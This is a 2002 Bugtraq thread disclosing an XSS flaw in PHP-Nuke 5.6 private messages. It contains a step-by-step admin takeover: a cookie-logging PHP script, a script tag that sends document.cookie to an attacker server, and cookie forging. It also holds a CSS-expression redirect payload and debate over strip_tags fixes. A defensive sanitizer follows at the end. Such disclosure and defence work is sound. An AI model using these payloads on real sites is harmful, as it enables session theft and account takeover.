Bugtraq mailing list archives
RE: PHP-Nuke v5.6 - Users can compromise admin accts.
From: "Eric Stevens" <eric () odysseydesigngroup com>
Date: Fri, 16 Aug 2002 15:56:10 -0400
I think his point is this: simply invoking strip_tags doesn't prevent scripts or other harmfuls from getting through on the tags that you do allow. The PHP manual, under the function entry for strip_tags(), even notes a warning:

---
Warning
This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.
---

see http://www.php.net/manual/en/function.strip-tags.php

Being able to execute arbitrary javascript in a private message would allow you to steal the cookies of the admin, though you may have to do a small amount of social engineering to get the admin to move his mouse overtop of the text inside the appropriate tag for an onMouseOver call. Besides, I believe his exploit would work exactly the same for any of the tags that you do allow.

You might do better with the following code: (warning, not tested!!!!!! Haven't played with PHP nuke since version 4.something when I was defaced because of a security bug and stopped using it):

// keep only the four allowed tags
$message = strip_tags($message, '<br><b><u><i>');
// then drop everything between the tag name and the closing > on those tags
// (preg_replace takes pattern, replacement, subject, in that order)
$message = preg_replace("'(</?[biu][r]?)[^>]*(>)'", "\\1\\2", $message);

Once again, I'll point out that this code hasn't been tested, it's been a long time since I played with PHP Nuke or regular expressions. The idea is to take the four tags that you do allow, and strip out anything between the <, optional /, tag name, and >.

-MightyE
www.mightye.org

-----Original Message-----
From: <-delusion-> [mailto:delusi0n () bellsouth net]
Sent: Thursday, August 15, 2002 9:16 PM
To: bugtraq () securityfocus com
Subject: Re: PHP-Nuke v5.6 - Users can compromise admin accts.

Jelmer's accusation that my proposed fix is flawed is wrong. He demonstrates a code that uses the <a> tag, if you look at my solution:

$message = strip_tags($message, '<br><b><u><i>');

The <a> tag is not allowed. Only the tags <br><b><u><i> are allowed.
I did talk to Jelmer and told him my solution successfully stripped the tags from his code; he replied with this message:

<?php
$myText = '<a done=false STYLE="visibility : hidden; word-spacing : expression( !(eval(this.done)) ?
location.href=\'http://kuperus.xs4all.nl\'
: 0 ); word-wrap : expression(this.done=true);"> test</a>';
$string = strip_tags($myText, '<a><b><i><u>'); <a>
echo $string
?>

works on my php 4.06

He uses this string..

$string = strip_tags($myText, '<a><b><i><u>'); <a>

Which allows the <a> tag. So therefore his code got executed when he ran it. It was just a mistake on Jelmer's part. If you seek a quick fix for this vuln, just use my solution. It works.

-delusion
http://digital-delusions.dyn.ee
On Thu, 2002-08-15 at 19:08, Jelmer wrote:

IMHO this whole email is just stating the obvious. On top of that the proposed fix is flawed. The PHP strip_tags function does not strip attributes so this is possible in your proposed fix:

<a done=false STYLE="visibility : hidden; word-spacing : expression( !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 ); word-wrap : expression(this.done=true);"> test</a>

It's a bit messy but gets the job done. It works by using css expressions (a feature afaik native to Internet explorer) in the style tag.

-- jelmer

----- Original Message -----
From: "<-delusion->" <delusi0n () bellsouth net>
To: <bugtraq () securityfocus com>; <webappsec () secuirtyfocus com>
Sent: Thursday, August 15, 2002 10:30 AM
Subject: PHP-Nuke v5.6 - Users can compromise admin accts.

Tested on PHP-Nuke v5.6 with Mozilla on Linux (should work on past versions and on most browsers)

Impact:
---------------------------------------------
Allows any user to get admin access to a PHP-Nuke site.

Summary:
----------------------------------------------
Due to an XSS flaw in PHPNuke's Private Messaging module, users can send messages with html code that will be executed without any filtering. In old PHPNuke versions XSS allowed theft of cookies which stored passwords in base64 encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it encodes it into base64 and puts it into a cookie. This made stolen cookies useless if the attacker just tried decoding the base64 encrypted pass, because he just got the MD5 encrypted pass.

Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass with the encrypted one in the database, I was able to use the md5 encrypted pass I got from the stolen cookie to authenticate myself. PHPNuke sets cookies by base64 encoding a string that looks like this:

username:md5_encrypted_pass:lang

Since I can get the md5_encrypted pass all I have to do is launch a script that base64 encodes a string like the one above, and sets it as a cookie on my box.

Exploit:
-------------------------------------------------
For this exploit to work, you must create the following files in your web server's directory.

cookie.php containing this:

<?
$fp = fopen("cookie.txt","a");
fputs($fp, $cookie);
fclose($fp);
print "Message Not Found!"; /* this is so the admin doesn't get scared and thinks it's some bug. */
?>

test.php containing:

<?
$admin = base64_encode("decoded_string") ;
setcookie("admin","$admin",time()+2592000);
?>

You will find out what to replace decoded_string with..

1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+document.cookie);</script>
2. Wait awhile until the admin checks the message then check cookie.txt on yer server.
3. From cookie.txt.. copy the encrypted text after admin= and before the ;
4. Go to http://www.isecurelabs.com/base64.php paste the copied text, click decode. It should give u a string like this: username:md5_encrypted_passwd:language (language may be blank).
5. Paste the decoded string into test.php like so.
<?
$admin = base64_encode("paste decoded string here");
setcookie("admin","$admin",time()+2592000);
?>
6. Login as any user on the site
7. Send private message to self containing: <iframe src="http://yerserver/test.php"></iframe>
Open the message and a cookie will now be set on yer box, but it will be configured with your server's URL. So all u gotta do is replace yer url wit the nuked site.
8. For mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/ directory, replace the url of yer server to the nuked site; for other browsers just find the Cookie from your server and edit it so instead of showing your url it shows the url of the nuked site.
9. Restart yer browser (close and open up again). Go back into the nuked site and you are now admin. :D

Temp Solution:
-------------------------------------------------
Edit reply.php in /modules/Private_Messages/ and make $message be stripped of html tags. Go to line 75 in reply.php and add this line:

$message = strip_tags($message, '<br><b><u><i>');

That will remove any html tags that aren't <br><b><u> or <i>. So it will prevent the XSS.
-------------------------------------------------
NOTE: I wasn't able to contact the php nuke person, I couldn't find an on their site, and when I signed up for membership I never got the password, so if u can, let them know asap so they can fix this.

Another Vulnerability Brought to you by,
delusion
http://digital-delusions.dyn.ee
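The thread's core point, made by Eric Stevens and demonstrated by Jelmer's STYLE="...expression(...)" payload, is that an allowlist built on strip_tags() keeps every attribute on the tags it lets through. As an added example (not code from the thread or from PHP-Nuke), here is a Python allowlist sanitizer that rebuilds output from parsed tokens instead: allowed tags are re-emitted with no attributes at all, everything else is HTML-escaped text, so there is no attribute left for a style, onmouseover or expression() payload to live in. It uses only the standard library's html.parser; the tag set <br><b><u><i> is the one the thread's workaround allows.

```python
import html
from html.parser import HTMLParser

# The tags the thread's PHP-Nuke workaround allows: <br><b><u><i>.
ALLOWED_TAGS = {"br", "b", "u", "i"}


class AllowlistSanitizer(HTMLParser):
    """Rebuild markup from parsed tokens, keeping only allowlisted tags.

    Every attribute is discarded, even on allowed tags, so a STYLE=
    "...expression(...)" or onmouseover payload has nowhere to live.
    Text, including the body of a dropped <script>, is HTML-escaped.
    Unclosed allowed tags are closed at the end so output stays balanced.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []   # stack of currently open allowed container tags

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return       # disallowed tag is dropped; its text still flows through
        self.out.append(f"<{tag}>")   # attrs deliberately ignored
        if tag != "br":
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open:
            while True:  # close intermediates so nesting stays well-formed
                top = self.open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

    def handle_comment(self, data):
        pass             # comments never reach the output


def sanitize(untrusted: str) -> str:
    """Return a safe HTML fragment for untrusted user input."""
    p = AllowlistSanitizer()
    p.feed(untrusted)
    p.close()
    while p.open:        # close anything the user left open
        p.out.append(f"</{p.open.pop()}>")
    return "".join(p.out)
```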